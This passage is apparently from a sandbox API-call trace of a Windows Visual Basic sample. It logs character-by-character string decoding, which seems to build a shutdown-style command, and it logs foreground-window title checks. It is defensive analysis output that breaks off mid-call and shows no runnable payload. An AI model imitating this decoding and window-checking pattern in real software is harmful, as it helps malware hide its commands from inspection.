lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.373] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.374] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.374] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.374] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.375] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.375] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.375] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.376] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.376] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.376] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.377] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.377] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.377] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.389] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.390] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.390] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.390] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.391] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.391] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.391] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.392] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.392] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.392] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.393] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.394] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.394] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.394] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.395] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.395] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.395] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.396] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.396] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.397] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.397] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.397] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.398] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.398] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.398] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.399] GetForegroundWindow () returned 0x102c2 [0086.399] GetLastError () returned 0x0 [0086.399] SysStringLen (param_1=" ") returned 0xff [0086.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.399] SysStringLen (param_1=" ") returned 0xff [0086.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.399] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.399] GetLastError () returned 0x0 [0086.399] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.400] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.400] SysStringLen (param_1="Acti") returned 0x4 [0086.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0xe57084, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0086.400] SetWindowTextA (hWnd=0x2036e, lpString="Acti") returned 1 [0086.400] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0086.400] GetFocus () returned 0x0 [0086.400] lstrlenA (lpString="Acti") returned 4 [0086.400] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x5) returned 0x310bcd0 [0086.400] GetWindowTextA (in: hWnd=0x2036e, lpString=0x310bcd0, nMaxCount=5 | out: lpString="Acti") returned 4 [0086.401] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x5, lParam=0x310bcd0) returned 0x4 [0086.401] GetFocus () returned 0x0 [0086.401] lstrcmpA (lpString1="Acti", lpString2="Acti") returned 0 [0086.401] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.401] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0086.401] GetFocus () returned 0x0 [0086.401] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x5) returned 0x310bcd0 [0086.401] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x5, lParam=0x310bcd0) returned 0x4 [0086.401] GetFocus () returned 0x0 [0086.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0086.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0xe57084, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0086.401] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.402] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0086.495] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0086.495] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0086.495] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0086.495] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0086.496] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0086.496] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.497] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.497] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.498] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.498] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.498] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.498] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.499] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.499] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.499] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.500] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.500] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.500] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.501] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.501] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.502] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.502] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.502] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.503] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.503] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.503] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0be, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.504] VarSub (in: 